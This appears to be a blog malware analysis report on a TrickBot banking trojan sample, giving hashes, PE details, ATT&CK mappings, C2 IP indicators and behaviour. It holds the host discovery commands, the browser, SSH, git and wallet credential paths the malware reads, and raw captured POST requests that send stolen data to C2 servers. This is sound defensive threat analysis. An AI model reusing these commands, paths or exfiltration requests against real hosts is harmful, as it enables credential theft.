Malware Analysis: TrickBot

Jul 30, 2020 • malware_analysis

Disclaimer

The following is a Malware analysis report for the binary with SHA-256 hash 91beb7c43da3dd723c9d44629ab656b4f913c5ec111d1d362279938645f7edd3.
The binary can be downloaded from MalwareBazaar
I take no responsibility for any actions you take based on this report.
Use caution when downloading and executing malware.
Use a virtual machine, be safe, have fun.

Opinions

TrickBots main goal, being a banking trojan at heart, is to steal credit card and banking account information.
However that has not been lucrative enough for the bad actors, hence more and more data is being searched for and the use of stage two payloads has increased.

This sample was only running for 15-20 minutes. Typically in TrickBot infections the malware will continue to beacon out indefinitely.
It is not uncommon to see a stage two payload pushed to beaconing victims days after the initial infections.
Typically the stage two payload will be more persistent and usually is either a ransomware variant, or a crypto miner.

TrickBot, like other popular trojans, will continue to evolve.
Anti-analysis techniques will be added. Capabilities will be added.
Whether its stealing financial or personal data or delivering ransomware, as long as there is a way to profit from it, it will continue to be used.

Analysis Summary

When executed this malware spawns another instance of itself.
This new process then runs and injects malicious code into the legitimate windows process wermgr.exe.
Wermgr.exe then calls svchost to run the host discovery commands.

The discovery seen in this sample involves running ipconfig.exe, net.exe, nltest.exe, as well as a GET request to wtfismyip[.]com which returns the public IP of the host.
Aside from data about the host and network the malware searched for sensitive information on the host as well.
Crypto currency credentials, ssh credentials, vpn credentials and configurations, vnc credentials and configurations, git credentials, as well as browser history, cache and saved passwords were searched for.
The malware then exfiltrates this data over HTTPS in a POST request to several of its C2 servers.
One of the POST requests indicate that credit card information may have also been searched for in the files on the host.

As for persistence, nothing of note was done, there were no created registry keys, scheduled tasks, or services.

Environment and tools


Static Analysis

Data Value
File Size 540724 bytes
Code Signing Unsigned
MD5 5930091b65aed9627dd1a4e86458b72f
SHA1 1e6ee2e805e21c007aa70217856bf31141ccc552
SHA256 91beb7c43da3dd723c9d44629ab656b4f913c5ec111d1d362279938645f7edd3
SSDEEP 6144:QXRZwJkHAfrJoz9KnjY/F0eAcLeRpJ0ulEypWu/blRTZSMIbBkfoqpArjO:QXRZmrJoBKIqkapJDmy4uBRTQ4pD
IMPHash a9daf8a064784a80002aa6baaea5ce3b
Compile Time Wed Jul 22 08:55:12 2020
Packed No
Compiler Microsoft Visual Basic 6.0
Linker Microsoft Linker
Overlay PDB 2.0 file link
Entropy 6.827

PE Sections

PE Section MD5 Entropy Size Entry Point Access
.text 9F4717E23F056519B2BEEB92221702EB 5.838 339968 bytes 0x0000487C R,X
.data 620F0B67A91F7F74151BC5BE745B7110 0 4096 bytes   R,W,ID
.rsrc 34DEF4049197F06B4075C6A749B19987 7.895 192512 bytes   R,ID

Imports

Library Count
oleaut32.dll 1
kernel32.dll 1
MSVBVM60.DLL 144

Possible Breakpoints

  • VirtualAlloc

Capabilities

Capability Namespace
execute anti-VM instructions (2 matches) anti-analysis/anti-vm/vm-detection
contains PDB path executable/pe/pdb
contain a resource (.rsrc) section executable/pe/section/rsrc
parse PE header (4 matches) load-code/pe

Tactics and Techniques

ATT&CK Tactic ATT&CK Technique
DEFENSE EVASION Virtualization/Sandbox Evasion::System Checks [T1497.001]
EXECUTION Shared Modules [T1129]

OSINT


Behavioral Analysis

Processes

Process PID Command Line
91beb7c43da3dd….exe 5388 91beb7c43da3dd….exe
91beb7c43da3dd….exe 3128 91beb7c43da3dd….exe
wermgr.exe 2904 wermgr.exe
svchost.exe 5204 svchost.exe
svchost.exe 6944 svchost.exe
ipconfig.exe 6016 ipconfig /all
net.exe 6240 net config workstation
net.exe 6404 net view /all
net.exe 264 net view /all /domain
nltest.exe 6556 nltest /domain_trusts
nltest.exe 3808 nltest /domain_trusts /all_trusts

Files Created

C:\Users\REM\AppData\Local\Temp\~DF5E8D1E64DE577706.TMP

Files Accessed

C:\Program Files\UltraVNC\ultravnc.ini
C:\Program Files\uvnc bvba\UltraVNC\ultravnc.ini
C:\Program Files (x86)\UltraVNC\ultravnc.ini
C:\Program Files (x86)\uvnc bvba\UltraVNC\ultravnc.ini
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\History
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\History.bak
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Web Data
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Local State.bak
C:\Users\REM\.config\git\credentials
C:\Users\REM\.git-credentials

Directories Listed

C:\Users\REM\AppData\Roaming\bitcoin
C:\Users\REM\AppData\Roaming\litecoin
C:\Users\REM\.ssh
C:\Users\REM\AppData\Local\Microsoft\Windows\INetCookies
C:\Users\REM\AppData\Local\Microsoft\Windows\INetCache
C:\Users\REM\AppData\Local\Microsoft\Windows\INetCache\Content.IE5
C:\Users\REM\AppData\Local\Microsoft\Windows\INetCache\IE

PCAP

Download

Protocols

Protocol Number of Packets
TCP 1218
SSL 623
HTTP 10

Indicators of Compromise

  • 103.12.161.194
  • 103.111.83.246
  • 103.12.161.194
  • 82.146.46.209
  • 194.5.249.157
  • 96.9.73.73
  • 203.176.135.102

Exfiltration

POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/81/ HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=---------KNFVSHSAHHJUPYKX User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 194.5.249.157:443 Content-Length: 219 Connection: Close Cache-Control: no-cache -----------KNFVSHSAHHJUPYKX Content-Disposition: form-data; name="data" -----------KNFVSHSAHHJUPYKX Content-Disposition: form-data; name="source" OpenVPN passwords and configs -----------KNFVSHSAHHJUPYKX--
POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/83/ HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=---------OCPLLBXQPEACMBMT User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 194.5.249.157:443 Content-Length: 473 Connection: Close Cache-Control: no-cache -----------OCPLLBXQPEACMBMT Content-Disposition: form-data; name="formdata" {"descr":["NordVPN"],"dns1":["103.86.99.100"],"email":["USERNAME"],"q":["microsoft office"],"search":["91beb7c43da3dd723c9d44629ab656b4f913c5ec111d1d362279938645f7edd3"],"usernamefld":["admin"]}-----------OCPLLBXQPEACMBMT Content-Disposition: form-data; name="billinfo" {]}-----------OCPLLBXQPEACMBMT Content-Disposition: form-data; name="cardinfo" {]} -----------OCPLLBXQPEACMBMT--
POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/81/ HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=---------IMJCMDOMDOMKUGNM User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 96.9.73.73 Content-Length: 219 Connection: Close Cache-Control: no-cache -----------IMJCMDOMDOMKUGNM Content-Disposition: form-data; name="data" -----------IMJCMDOMDOMKUGNM Content-Disposition: form-data; name="source" OpenVPN passwords and configs -----------IMJCMDOMDOMKUGNM--
POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/81/ HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=---------OTTNHTNLBMUSVCXD User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 194.5.249.157:443 Content-Length: 210 Connection: Close Cache-Control: no-cache -----------OTTNHTNLBMUSVCXD Content-Disposition: form-data; name="data" -----------OTTNHTNLBMUSVCXD Content-Disposition: form-data; name="source" OpenSSH private keys -----------OTTNHTNLBMUSVCXD--
POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/83/ HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=---------QAKGETNFFXRQJOMX User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 96.9.73.73 Content-Length: 473 Connection: Close Cache-Control: no-cache -----------QAKGETNFFXRQJOMX Content-Disposition: form-data; name="formdata" {"descr":["NordVPN"],"dns1":["103.86.99.100"],"email":["USERNAME"],"q":["microsoft office"],"search":["91beb7c43da3dd723c9d44629ab656b4f913c5ec111d1d362279938645f7edd3"],"usernamefld":["admin"]}-----------QAKGETNFFXRQJOMX Content-Disposition: form-data; name="billinfo" {]}-----------QAKGETNFFXRQJOMX Content-Disposition: form-data; name="cardinfo" {]} -----------QAKGETNFFXRQJOMX--
POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/81/ HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=---------BSBWMEZDSAFVUJLA User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 96.9.73.73 Content-Length: 210 Connection: Close Cache-Control: no-cache -----------BSBWMEZDSAFVUJLA Content-Disposition: form-data; name="data" -----------BSBWMEZDSAFVUJLA Content-Disposition: form-data; name="source" OpenSSH private keys -----------BSBWMEZDSAFVUJLA--